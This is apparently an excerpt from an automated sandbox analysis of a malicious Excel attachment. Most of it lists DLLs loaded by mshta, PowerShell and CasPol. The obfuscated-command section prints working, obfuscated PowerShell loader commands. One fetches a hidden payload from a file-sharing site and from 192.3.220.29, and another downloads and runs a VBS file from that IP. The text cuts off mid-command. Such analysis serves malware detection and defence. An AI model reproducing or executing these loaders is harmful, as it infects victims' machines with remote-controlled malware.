                    Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
                    Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: shcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: webio.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: shcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: PORTS SITUATION BULK CARRIERS.xlsx.0.drInitial sample: OLE zip file path = xl/calcChain.xml
                    Source: PORTS SITUATION BULK CARRIERS.xlsx.0.drInitial sample: OLE zip file path = docProps/thumbnail.wmf
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                    Source: pi-77159.xlsStatic file information: File size 1136640 > 1048576
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.pdb source: powershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.pdbhP source: powershell.exe, 00000006.00000002.480662155.0000000002331000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.pdb source: powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.pdbhP source: powershell.exe, 00000014.00000002.532499393.000000000256C000.00000004.00000800.00020000.00000000.sdmp
                    Source: PORTS SITUATION BULK CARRIERS.xlsx.0.drInitial sample: OLE indicators vbamacros = False
                    Source: pi-77159.xlsInitial sample: OLE indicators encrypted = True

                    Data Obfuscation

                    barindex
                    Obfuscated command line found
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
                    PowerShell case anomaly found
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEF